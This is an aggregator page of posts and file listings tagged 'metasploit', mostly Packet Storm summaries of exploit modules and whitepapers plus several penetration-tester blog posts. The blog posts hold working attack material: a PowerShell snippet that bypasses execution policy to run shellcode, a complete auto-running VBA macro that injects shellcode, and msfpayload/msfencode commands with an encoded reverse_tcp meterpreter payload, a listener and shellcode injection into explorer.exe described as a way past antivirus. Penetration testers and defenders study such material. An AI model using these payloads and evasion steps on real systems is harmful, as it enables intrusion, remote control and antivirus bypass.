«
Expand/Collapse
208 items tagged "metasploit"
Related tags:
vulnerability [+],
class [+],
open source platform [+],
network security professionals [+],
arbitrary code [+],
oracle [+],
Newbie [+],
web admin [+],
slides [+],
server [+],
ruby programming [+],
malicious web [+],
buffer overflow [+],
axis [+],
version [+],
stack buffer [+],
ryan linn tags [+],
portuguese [+],
penetration [+],
overflow [+],
meterpreter [+],
linn [+],
information gathering [+],
code execution [+],
buffer [+],
bridge [+],
based buffer overflow [+],
audio [+],
Support [+],
General [+],
Area [+],
windows [+],
vnc [+],
victim machine [+],
sneak peak [+],
sneak [+],
remote buffer overflow [+],
remote [+],
pdf [+],
netcat [+],
mario ceballos [+],
jboss [+],
james lee tags [+],
gui [+],
exploitation [+],
denial of service [+],
chris gates [+],
ceballos [+],
attacker [+],
web authors [+],
vwr [+],
vulnerability assessment [+],
visiwave [+],
valid pointer [+],
tool [+],
tftp [+],
tag team [+],
system [+],
syscall [+],
showreport [+],
routine ends [+],
rest [+],
request [+],
read [+],
pxe server [+],
pxe [+],
pass [+],
nessus [+],
multiplayer [+],
msfconsole [+],
mcafee [+],
malicious attacker [+],
linux partition [+],
linux kernel [+],
intellitamper [+],
hijacking [+],
h.d. moore tags [+],
guided missiles [+],
ftp service [+],
freepbx [+],
ez shopwner [+],
exe attempts [+],
drive bys [+],
denial [+],
default extensions [+],
darknet [+],
d moore [+],
cross [+],
command execution [+],
code [+],
callmenum [+],
browser [+],
automatic browser [+],
authors [+],
absoluteftp [+],
ExploitsVulnerabilities [+],
metasploit framework [+],
framework [+],
with [+],
wireless access points [+],
windows exploits [+],
viscom [+],
usa [+],
unreal ircd [+],
unreal [+],
unc path [+],
tricks [+],
track [+],
tips and tricks [+],
tips [+],
telephony [+],
target frame [+],
tar gz [+],
system privileges [+],
svn [+],
smart phones [+],
shortcut icon [+],
shortcut files [+],
shortcut [+],
server version [+],
serenity audioplayer [+],
security [+],
scanner [+],
released [+],
pre [+],
post [+],
pivot [+],
payloads [+],
paper [+],
oracle instances [+],
novelliprint [+],
novell iprint [+],
nmap [+],
mike kershaw [+],
max moser [+],
magazine [+],
low [+],
level [+],
issue [+],
ircd [+],
icon [+],
helix server [+],
handler [+],
hacking [+],
ftpd [+],
express tags [+],
exe [+],
evasion [+],
easy [+],
desenvolvendo [+],
daytona [+],
day [+],
danke schon [+],
crossdomain [+],
control [+],
configuration [+],
command shell [+],
clubhack [+],
carat [+],
bugtraq [+],
black hat [+],
beta [+],
backdoor [+],
automated configuration [+],
audioplayer [+],
assessment toolkit [+],
aslr [+],
armitage [+],
agentx [+],
Wireless [+],
Videos [+],
Final [+],
youtube [+],
xxx [+],
xss [+],
work [+],
win32 exe [+],
win [+],
whooo [+],
weird stuff [+],
webserver setup [+],
webserver [+],
webdavtest [+],
webdav [+],
web application [+],
vulnerable systems [+],
vulnerabilidad [+],
vncinject [+],
vnc server [+],
vmware server [+],
vmware [+],
vm machine [+],
videotutorial [+],
valid credentials [+],
user [+],
uri [+],
unmanned aerial vehicles [+],
unbreakable [+],
type [+],
tutorial [+],
tmp [+],
time [+],
tfe [+],
text shell [+],
text [+],
test market [+],
test [+],
tcp connection [+],
tcp [+],
target machine [+],
target id [+],
target address [+],
target [+],
talk [+],
tags [+],
tag [+],
system options [+],
syntax problems [+],
subversion client [+],
stopping [+],
standalone application [+],
ssh [+],
speicher [+],
space restrictions [+],
sp3 [+],
someone [+],
somebody [+],
social engineering [+],
smart [+],
slogin [+],
sid [+],
shiz [+],
shikata ga nai [+],
shellcode [+],
shell [+],
setup web [+],
setup [+],
service pack 3 [+],
service pack 1 [+],
security team [+],
security researchers [+],
script logs [+],
scanning [+],
scanner module [+],
ryan linn [+],
run [+],
ruby ruby [+],
root account [+],
root [+],
reloaded [+],
relevant section [+],
registry [+],
received [+],
raw ruby [+],
quot [+],
question [+],
puerto 445 [+],
public options [+],
progresive [+],
product [+],
processor architecture [+],
pro [+],
powershell [+],
port [+],
poc [+],
php shell [+],
php [+],
pgp [+],
pentest [+],
penetration testers [+],
path [+],
password [+],
pack [+],
output options [+],
output [+],
org uk [+],
open source product [+],
open source implementation [+],
open source code [+],
open ports [+],
old server [+],
ocx [+],
oci [+],
ntp [+],
noobish [+],
no brainer [+],
nicolas [+],
network time protocol [+],
nbsp [+],
msfpayload [+],
msfencode [+],
msf [+],
ms10 [+],
moore production [+],
module search [+],
modified version [+],
metasploitable [+],
metasploit project [+],
meta [+],
maturation [+],
market [+],
macro code [+],
mac text [+],
long [+],
logs [+],
local network [+],
linux distro [+],
linux [+],
lib [+],
ldap service [+],
lan [+],
kind [+],
keyserver [+],
kernel stack [+],
java gui [+],
java [+],
iusr [+],
introducao [+],
internet explorer [+],
internet connectivity [+],
internet [+],
internal networks [+],
integer [+],
integard [+],
information [+],
index pages [+],
index [+],
impersonation [+],
http [+],
hotness [+],
host port [+],
host [+],
histoire [+],
hey guys [+],
hero dvd [+],
hero [+],
guided [+],
ftp server [+],
forwarding [+],
file [+],
fasttrack [+],
fast track [+],
fast [+],
exception handler [+],
everything [+],
evasion techniques [+],
euro [+],
ecc [+],
easyftp [+],
docume 1 [+],
dll [+],
directory traversal vulnerability [+],
dictionary attack [+],
des [+],
demo [+],
della [+],
dei [+],
declare [+],
debutant [+],
dbms [+],
davaroo [+],
database [+],
darwin [+],
core [+],
com [+],
clue [+],
clearev [+],
cleanup [+],
christian papathanasiou [+],
chat server [+],
cadaver [+],
byval [+],
bt4 [+],
borrado [+],
blogspot [+],
blip tv [+],
blah blah [+],
black [+],
autopwn [+],
authority [+],
attack [+],
and [+],
administration tools [+],
account [+],
Software [+],
Generali [+],
Fixes [+],
Espace [+],
Ecke [+],
Discussioni [+],
Discussion [+],
Bugs [+],
Angolo [+],
Anfnger [+],
whitepaper [+],
txt [+],
module [+],
video [+],
ruby [+],
Pentesting [+],
web [+],
usbsploit [+],
proof of concept [+],
exploits [+],
BackTrack [+],
testing [+],
stack overflow [+],
lnk files [+]
-
-
7:58
»
Carnal0wnage
This is a quick blog post based on my slides from the May 2012
NovaHackers Meeting
Two posts got me started looking at PowerShell and its ability to execute shellcode
http://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.htmland
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.htmlThe first post talks about executing shellcode and gives the calc.exe example. These examples work on x64 and x86. yay!
The second post talks about doing something more than calc.exe...getting shell whooo hooooo
You can review the code but it only shows a x86/32bit shellcode. This will fail miserably on x64.
I was initially thought it would be an easy fix, just grab an x64 payload from MSF. Problem is there are no x64 http/https payloads...
CG was a sad panda.
This left me with two options:
Suck it up and use an existing x64 payload (like rev_tcp) or just pop calc.exe to prove how awesome i am during pentests
or
Invoke 32 bit PowerShell and run 32 bit shellcode (now we get http/https payloads)
So googling turned up a way to tell PowerShell to use the x86 version even on x64. The solution i used was here:
http://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspxYou will need to set the execution policy for v1.0 powershell, or possibly try a
bypass technique.
I ended up adding this to Nicolas' code before it started doing its thing (line 24). It detects if its not x86 and just runs the shellcode with the x86 PowerShell. You'll have to set the execution policy for it first.
[Byte[]]$sc = $sc32
if ($env:Processor_Architecture -ne "x86")
{
write-warning "WTF! This is 64x, switching to 32x and continuing script."
&"$env:windir\syswow64\windowspowershell\v1.0\powershell.exe" -noprofile -file $myinvocation.Mycommand.path -executionpolicy bypass
exit
}now it works
Remember that you have to migrate out of the PowerShell process.
Much like the office macro and shellcode exec, if user closes office, or you close exit powershell process shell goes bye-bye.
References:
http://0entropy.blogspot.com/2012/04/powershell-metasploit-meterpreter-and.htmlhttp://www.exploit-monday.com/2011/11/powersyringe-powershell-based-codedll.htmlhttp://www.exploit-monday.com/2011/10/exploiting-powershells-features-not.htmlhttp://www.obscuresecurity.blogspot.com/2011/08/powershell-executionpolicy.htmlhttp://www.viveksharma.com/TECHLOG/archive/2008/12/03/running-scripts-that-only-work-under-32bit-cleanly-in-64bit.aspx
-
-
5:00
»
Carnal0wnage
Post [7] HTTP PUT/WebDAV/SEARCH
Man I love mis-configured WebDAV, I have put a foot in many a network's ass with a writable WebDAV server. Like the browsable directories thing, its *usually* not writable, but it occurs often enough that you really have to make sure you check it each time you see it.
LOW?
IIS5 is awesome (not) because WebDAV is enabled by default but web root is not writable. Wait who still runs Windows 2000?! i know i know app cant be rewritten...accepted risk...blah blah...no one will ever use this to pwn my network...its ok if that DA admin script logs into it daily....
The "game" is finding the writable directory (if one exists) on the WebDAV enabled server.
*Dirbusting and ruby FTW*
I find that its usually NOT the web root, so honestly it can be a challenge to find the writable directory. VA scanners can help, Nessus will actually tell you methods allowed per directory...still a challenge though.
Once you have a directory you want to test you can use
cadaver to manually test,
davtest, or
Ryan Linn's metasploit module for testing for WebDAV.
I've also done some posts on webDAV in the past
http://carnal0wnage.attackresearch.com/2010/05/more-with-metasploit-and-webdav.htmlhttp://carnal0wnage.attackresearch.com/2007/08/creating-http-options-auxiliary-module.htmlhdm had done a post on it in the past in relation to the asp payload, i cant find it on the R7 site but its mirrored here:
http://meta-sploit.blogspot.com/2010/01/exploiting-microsoft-iis-with.htmlDecent writeup here:
http://www.ubersec.com/downloads/WEBDAV_Exploit_example.pdfHTTP PUTHTTP PUT/SEARCH usually gets rolled into
Web scanners are better about alerting on PUT as an available method and most will attempt the PUT for you. I don't think any vuln scanners do, i'm sure someone will correct me if i'm wrong.
Writable HTTP PUT is rare (least for me) although some friends say they see it all the time.
metasploit has a module to test for PUT functionality as well.
http://www.metasploit.com/modules/auxiliary/scanner/http/http_putHTTP SEARCHHTTP SEARCH can be fun. When enabled, will give you a listing of every file in the webroot.
Mubix did a post on it
http://www.room362.com/blog/2011/8/26/iis-search-verb-directory-listing.html
-
-
13:36
»
Packet Storm Security Exploits
This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.
-
13:36
»
Packet Storm Security Recent Files
This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.
-
13:36
»
Packet Storm Security Misc. Files
This Metasploit module exploits FreePBX version 2.10.0,2.9.0 and possibly older. Due to the way callme_page.php handles the 'callmenum' parameter, it is possible to inject code to the '$channel' variable in function callme_startcall in order to gain remote code execution. Please note in order to use this module properly, you must know the extension number, which can be enumerated or bruteforced, or you may try some of the default extensions such as 0 or 200. Also, the call has to be answered (or go to voice). Tested on both Elastix and FreePBX ISO image installs.
-
22:45
»
Packet Storm Security Misc. Files
Whitepaper called Metasploit: Low Level View. It touches on topics such as code injection and malware detection evasion / Metasploit encoders.
-
-
14:21
»
Carnal0wnage
scriptjunkie recently had a post on
Direct shellcode execution in MS Office macros I didnt see it go into the metasploit trunk, but its there. How to generate macro code is in the post but i'll repost it here so i dont have to go looking for it elsewhere later. He even has a sample to start with so you can see how it works. Just enable the Developer tab, then hit up the Visual Basic button to change code around.
msf > use payload/windows/exec
msf payload(exec) > set CMD calc
CMD => calc
msf payload(exec) > set EXITFUNC thread
EXITFUNC => thread
msf payload(exec) > generate -t vba
#If Vba7 Then
Private Declare PtrSafe Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As LongPtr, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As LongPtr
Private Declare PtrSafe Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As LongPtr
Private Declare PtrSafe Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As LongPtr, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As LongPtr
#Else
Private Declare Function CreateThread Lib "kernel32" (ByVal Zopqv As Long, ByVal Xhxi As Long, ByVal Mqnynfb As Long, Tfe As Long, ByVal Zukax As Long, Rlere As Long) As Long
Private Declare Function VirtualAlloc Lib "kernel32" (ByVal Xwl As Long, ByVal Sstjltuas As Long, ByVal Bnyltjw As Long, ByVal Rso As Long) As Long
Private Declare Function RtlMoveMemory Lib "kernel32" (ByVal Dkhnszol As Long, ByRef Wwgtgy As Any, ByVal Hrkmuos As Long) As Long
#EndIf
Sub Auto_Open()
Dim Wyzayxya As Long, Hyeyhafxp As Variant, Lezhtplzi As Long, Zolde As Long
#If Vba7 Then
Dim Xlbufvetp As LongPtr
#Else
Dim Xlbufvetp As Long
#EndIf
Hyeyhafxp = Array(232,137,0,0,0,96,137,229,49,210,100,139,82,48,139,82,12,139,82,20, _
139,114,40,15,183,74,38,49,255,49,192,172,60,97,124,2,44,32,193,207, _
13,1,199,226,240,82,87,139,82,16,139,66,60,1,208,139,64,120,133,192, _
116,74,1,208,80,139,72,24,139,88,32,1,211,227,60,73,139,52,139,1, _
214,49,255,49,192,172,193,207,13,1,199,56,224,117,244,3,125,248,59,125, _
36,117,226,88,139,88,36,1,211,102,139,12,75,139,88,28,1,211,139,4, _
139,1,208,137,68,36,36,91,91,97,89,90,81,255,224,88,95,90,139,18, _
235,134,93,106,1,141,133,185,0,0,0,80,104,49,139,111,135,255,213,187, _
224,29,42,10,104,166,149,189,157,255,213,60,6,124,10,128,251,224,117,5, _
187,71,19,114,111,106,0,83,255,213,99,97,108,99,0)
Xlbufvetp = VirtualAlloc(0, UBound(Hyeyhafxp), &H1000, &H40)
For Zolde = LBound(Hyeyhafxp) To UBound(Hyeyhafxp)
Wyzayxya = Hyeyhafxp(Zolde)
Lezhtplzi = RtlMoveMemory(Xlbufvetp + Zolde, Wyzayxya, 1)
Next Zolde
Lezhtplzi = CreateThread(0, 0, Xlbufvetp, 0, 0, 0)
End Sub
Sub AutoOpen()
Auto_Open
End Sub
Sub Workbook_Open()
Auto_Open
End Sub
The important thing to remember is that with this method you'll NOT be dropping a vbs or bin and you'll be running inside of excel/word/whatever so you need to make sure you set up an autorunscript or macro to migrate out of the process else you'll be losing the shell as soon as they exit the office application.
-
-
17:08
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
-
17:08
»
Packet Storm Security Recent Files
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
-
17:08
»
Packet Storm Security Misc. Files
This Metasploit module exploits a vulnerability found in McAfee Security-as-a-Service. The ShowReport() function (located in the myCIOScn.dll ActiveX component) fails to check the FileName argument, and passes it on to a ShellExecuteW() function, therefore allows any malicious attacker to execute any process that's on the local system. However, if the victim machine is connected to a remote share (or something similar), then it's also possible to execute arbitrary code. Please note that a custom template is required for the payload, because the default Metasploit template is detectable by McAfee -- any Windows binary, such as calc.exe or notepad.exe, should bypass McAfee fine.
-
-
7:41
»
Packet Storm Security Recent Files
This Metasploit module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This Metasploit module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
-
7:41
»
Packet Storm Security Misc. Files
This Metasploit module exploits a stack based buffer overflow in the Active control file ImageViewer2.OCX by passing a overly long argument to an insecure TifMergeMultiFiles() method. Exploitation results in code execution with the privileges of the user who browsed to the exploit page. The victim will first be required to trust the publisher Viscom Software. This Metasploit module has been designed to bypass DEP and ASLR under XP IE8, Vista and Win7 with Java support.
-
-
7:50
»
Packet Storm Security Exploits
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
-
7:50
»
Packet Storm Security Recent Files
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
-
7:50
»
Packet Storm Security Misc. Files
This Metasploit module exploits VanDyke Software AbsoluteFTP by overflowing a filename buffer related to the LIST command. Versions 1.9.6 through 2.2.10 are affected.
-
-
22:26
»
Packet Storm Security Exploits
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
-
22:26
»
Packet Storm Security Recent Files
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
-
22:26
»
Packet Storm Security Misc. Files
This is the full Daytona package that houses three remote JBoss exploits with authentication bypass. They are ported from Metasploit and beefed up with two scanners.
-
-
7:36
»
Packet Storm Security Recent Files
Whitepaper called Using QR Tags to Attack Smart Phones (Attaging). It discusses the threatscape related to arbitrary scanning of these tags and using Metasploit to exploit them.
-
7:36
»
Packet Storm Security Misc. Files
Whitepaper called Using QR Tags to Attack Smart Phones (Attaging). It discusses the threatscape related to arbitrary scanning of these tags and using Metasploit to exploit them.
-
0:24
»
SecDocs
Authors:
Max Moser Philipp Schrödel Tags:
web application web Metasploit Event:
Hashdays 2010 Abstract: The talk introduces our new open source extension for the well known Metasploit Framework, called CARAT. It uses Metasploits Meterpreter technology to communicate in between the client (to be scanned target) and the server (The Metasploit Server running the CARAT plugin), execute commands and consolidate the results. By introducing client specific job scheduling to Metasploit, CARAT is a Framework for automated configuration validation, security assessments and functional testing of components and applications. In contrary to a lot of other available frameworks, CARATs architecture is as simple as possible, this allows a great amount of flexibility to its users.
-
-
18:07
»
Packet Storm Security Exploits
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extraction various data from the database and spawns shells through netcat and metasploit.
-
18:07
»
Packet Storm Security Recent Files
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extraction various data from the database and spawns shells through netcat and metasploit.
-
18:07
»
Packet Storm Security Misc. Files
EZ-ShoPwner version 0.1 is a pwning tool for EZ-Shop. It allows an attacker to extraction various data from the database and spawns shells through netcat and metasploit.
-
-
13:14
»
Packet Storm Security Exploits
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen.
-
13:14
»
Packet Storm Security Recent Files
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen.
-
13:14
»
Packet Storm Security Misc. Files
This Metasploit module provides a PXE server, running a DHCP and TFTP server. The default configuration loads a linux kernel and initrd into memory that reads the hard drive; placing the payload on the hard drive of any Windows partition seen, and add a uid 0 user with username and password metasploit to any linux partition seen.
-
-
18:20
»
Packet Storm Security Recent Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
18:20
»
Packet Storm Security Tools
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
18:20
»
Packet Storm Security Misc. Files
The Metasploit Framework is an advanced open-source platform for developing, testing, and using exploit code. Metasploit is used by network security professionals to perform penetration tests, system administrators to verify patch installations, product vendors to perform regression testing, and security researchers world-wide. The framework is written in the Ruby programming language and includes components written in C and assembler.
-
-
6:40
»
Packet Storm Security Recent Files
This whitepaper is an article that covers the basic structure of Metasploit and the need for it as a framework. It provides guidance on the different techniques of information gathering and scans.
-
6:40
»
Packet Storm Security Misc. Files
This whitepaper is an article that covers the basic structure of Metasploit and the need for it as a framework. It provides guidance on the different techniques of information gathering and scans.
-
-
8:27
»
Packet Storm Security Recent Files
Whitepaper called Using Metasploit With Nessus Bridge On Ubuntu. The author discusses using the autopwn feature in Metasploit, running Nessus from within Metasploit, choices of databases to use, and the benefits of each.
-
8:27
»
Packet Storm Security Misc. Files
Whitepaper called Using Metasploit With Nessus Bridge On Ubuntu. The author discusses using the autopwn feature in Metasploit, running Nessus from within Metasploit, choices of databases to use, and the benefits of each.
-
-
17:47
»
Packet Storm Security Recent Files
ClubHACK Magazine Issue 18 - Topics covered include using Metasploit with Nessus bridge on Ubuntu, Armitage, penetration testing with Metasploit, and various other articles.
-
17:47
»
Packet Storm Security Misc. Files
ClubHACK Magazine Issue 18 - Topics covered include using Metasploit with Nessus bridge on Ubuntu, Armitage, penetration testing with Metasploit, and various other articles.
-
-
4:12
»
Carnal0wnage
You may find yourself needing to do process injection outside of metasploit/meterpreter. A good examples is when you have a java meterpreter shell or you have access to gui environment (citrix) and/or AV is going all nom nom nom on your metasploit binary.
There are two public options I have found; shellcodeexec and syringe.
Both allow you to generate shellcode using msfpayload (not currently working with msfvenom) and inject that into memory (process for syringe) and get your meterpreter shell.
shellcodeexec
https://github.com/inquisb/shellcodeexechttp://bernardodamele.blogspot.com/2011/04/execute-metasploit-payloads-bypassing.html= Short description =
shellcodeexec is a small script to execute in memory a sequence of opcodes.
"It supports alphanumeric encoded payloads: you can pipe your binary-encoded shellcode (generated for instance with Metasploit's msfpayload) to Metasploit's msfencode to encode it with the alpha_mixed encoder. Set the BufferRegister variable to EAX registry where the address in memory of the shellcode will be stored, to avoid get_pc() binary stub to be prepended to the shellcode."
"Spawns a new thread where the shellcode is executed in a structure exception handler (SEH) so that if you wrap shellcodeexec into your own executable, it avoids the whole process to crash in case of unexpected behaviours."
Make the payload:
$ ./msfpayload windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 R
| ./msfencode -a x86 -e x86/alpha_mixed -t raw BufferRegister=EAX
[*] x86/alpha_mixed succeeded with size 634 (iteration=1)
PYIIIIIIIIIIIIIIII7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlIxMYC0EPGpCPOyIuEaN2PdNkRrP0LKCbT
LNkQBVtNkT2VHTOX7QZGVTqIoVQIPLlGLPaQlC2TlEpKqZoVmC1ZgZBXpQBPWLKCbVpLKQRElGqZpLKQPRXK5IP
T4CzGqN0RpLKPHVxNkV8EpVaXSKSGLRiLKP4LKEQZvTqIoP1O0NLIQZoVmGqXGTxM0T5ZTGsCMIhEkQmTdPuIrR
xNkQHTdGqICRFNkVlPKNkPXELVaICNkC4NkGqZpK9CtVDEtCkCkPaV9QJPQKOM0PXCoPZNkTRZKNfQMCXEcTrEP
C0CXPwRSVRQOPTPhPLCGGVC7KOZuNXZ0GqEPEPVIZdQDV0PhQ9K0PkC0KOIERpPPV0PPQPPPQPPPCXZJTOIOKPK
OKeOgQzC5E8O0I8OxC1E8TBGpR1ClOyIvPjR0QFPWPhZ9OURTE1IoZuK5IPCDTLKORnVhRUZLE8XpLuI2PVKOIE
RJC0QzC4QFV7QxVbN9ZhQOIoZuNkTvRJG0E8EPVpGpEPRvPjGpCXRxLdCcIuIoIENsPSCZGpRvCcV7CXGrIIZhQ
OKOKeEQKsVIO6NeIfT5ZLKsAA
Set up a listener to catch the shell:
$ ./msfcli multi/handler PAYLOAD=windows/meterpreter/reverse_tcp EXITFUNC=thread LPORT=4444 LHOST=192.168.136.1 E
Run it on the windows side:
C:\WINDOWS\Temp>shellcodeexec.exe [msfencode's encoded payload]
**Must paste in the payload, cant be a .txt
Once you have shell you need to migrate out of it, it will be in the shellcodeexec process and as soon as someone ctrl-c or kills that cmd.exe the process dies and so does your shell
Looks like this:
Syringe
http://blog.securestate.com/post/2011/06/21/Syringe-utility-provides-ability-to-inject-shellcode-into-processes.aspxhttp://www.securestate.com/Documents/syringe.c = Short description =
"Syringe is a general purpose injection utility for the windows platform. It supports injection of DLLs, and shellcode into remote processes as well execution of shellcode (via the same method of shellcodeexec). It can be very useful for executing Metasploit payloads while bypassing many popular anti-virus implementations as well as executing custom made DLLs (not included)"
To compile “C:\codelocation\cl syringe.c”
C:\Documents and Settings\User\Desktop>syringe.exe
Syringe v1.2
A General Purpose DLL & Code Injection Utility
Usage:
Inject DLL:
syringe.exe -1 [ dll ] [ pid ]
Inject Shellcode:
syringe.exe -2 [ shellcode ] [ pid ]
Execute Shellcode:
syringe.exe -3 [ shellcode ]
-3 same issue as shellcodeexec, close cmd.exe or ctrl-c lose shell
-2 is preferred, located explorer.exe inject shellcode into that
C:\Documents and Settings\User\Desktop>tasklist
tasklist
Image Name PID Session Name Session# Mem Usage
========================= ====== ================ ======== ============
System Idle Process 0 Console 0 28 K
System 4 Console 0 236 K
smss.exe 540 Console 0 424 K
csrss.exe 604 Console 0 3,852 K
winlogon.exe 628 Console 0 5,012 K
services.exe 680 Console 0 3,440 K
lsass.exe 692 Console 0 1,408 K
vmacthlp.exe 848 Console 0 2,756 K
svchost.exe 864 Console 0 4,924 K
svchost.exe 944 Console 0 4,308 K
MsMpEng.exe 1040 Console 0 53,812 K
svchost.exe 1076 Console 0 23,780 K
svchost.exe 1164 Console 0 3,616 K
svchost.exe 1368 Console 0 3,916 K
explorer.exe 1624 Console 0 15,256 K
spoolsv.exe 1656 Console 0 6,072 K
VMwareTray.exe 1848 Console 0 5,044 K
VMwareUser.exe 1856 Console 0 6,328 K
msseces.exe 1864 Console 0 10,708 K
jusched.exe 1920 Console 0 4,304 K
msmsgs.exe 1928 Console 0 2,488 K
ctfmon.exe 1952 Console 0 3,248 K
svchost.exe 740 Console 0 3,760 K
jqs.exe 1108 Console 0 1,396 K
vmtoolsd.exe 1264 Console 0 9,976 K
VMUpgradeHelper.exe 1212 Console 0 4,176 K
TPAutoConnSvc.exe 2396 Console 0 4,392 K
alg.exe 2680 Console 0 3,612 K
TPAutoConnect.exe 3060 Console 0 4,848 K
iexplore.exe 3784 Console 0 16,300 K
iexplore.exe 4064 Console 0 45,392 K
wuauclt.exe 1224 Console 0 4,276 K
java.exe 1112 Console 0 27,516 K
java.exe 2520 Console 0 14,272 K
notepad.exe 440 Console 0 3,572 K
jucheck.exe 3112 Console 0 6,120 K
cmd.exe 3260 Console 0 2,700 K
tasklist.exe 3332 Console 0 4,580 K
wmiprvse.exe 3368 Console 0 5,824 K
C:\Documents and Settings\User\Desktop>syringe.exe -2 PYIIIIIIIIIIIIIIII7Q
ZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIIlZHMYEPGpEPE0NiXeVQXRQ
tNkCbTpNkRrVlLKPRVtNkRRExVoLwRjVFVQIoTqKpLlElCQCLVbVLQ0KqZoTMEQZgXbXpCbRwLK
CbVpNkCrElVaXPNkQPRXLEO0CDRjVaN0RpNkCxEHNkPXQ0VaICIsElG9LKP4LKEQZvVQIoTqKpL
lIQXOTMVaZgEhIpCEL4TCQmIhGKQmEtPuKRRxNkPXTdEQN3E6NkVlPKLKPXELGqICNkC4LKC1Zp
LIQTVDEtQKCkPaRyQJRqIoM0RxQOPZLKVrZKK6QMCXPnQuT4C0E8T7PiRNCYNiZFPTE8RlCGEvT
GIoZuTqKOPWRwV7RwPVPhEjPVQiLgKOXUZKCoCkEaO9V1PQQzTCRqCaCXKKQ0C0EPV3V0CXV7Oy
OoIVIoN5XkRhCiVQXRCbRHGpTrIpNdCbQBCbRqCbRpE8XkQEVNEkKOKeOyIVCZGrQKP1KOPWRwV
7CgRvE8VMVfGhQkIoZuOuO0RUTnPKCDTdE8K0VSGpGpOyKPPjC4RpQzEOCfRHT5PFOnK6IoXUZK
ZuXkQYM8McKOKOKOVOQQQhCtRBRPC0E8ZPMeNBV6IoXURJCpQxC0TPC0C0PhGpC0CpEPV7PhQHO
TPSM5KOKeOcPSV3LIIwRwPhEPEpEPEPRsV6E8EBZ6K9M2KOZuK5O0RTXMNkGwEQISMUKpPuXeQH
ZcM8RqIoIoKOEaP9GBVNTqGFP8VNEbGFTnP1VSVXEPAA 1624
Looks like this (you can use the same shellcode in syringe):
-
-
0:52
»
Packet Storm Security Recent Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
0:52
»
Packet Storm Security Misc. Files
Whitepaper called Post Exploitation using Metasploit pivot and port forward. A very nice feature in Metasploit is the ability to pivot through a meterpreter session to the network on the other side. This tutorial walks you through how this is done once you have a meterpreter session on a foreign box.
-
-
19:24
»
Packet Storm Security Exploits
This Metasploit module exploits a vulnerability in the Golden FTP service. This Metasploit module uses the PASS command to trigger the overflow.
-
19:24
»
Packet Storm Security Misc. Files
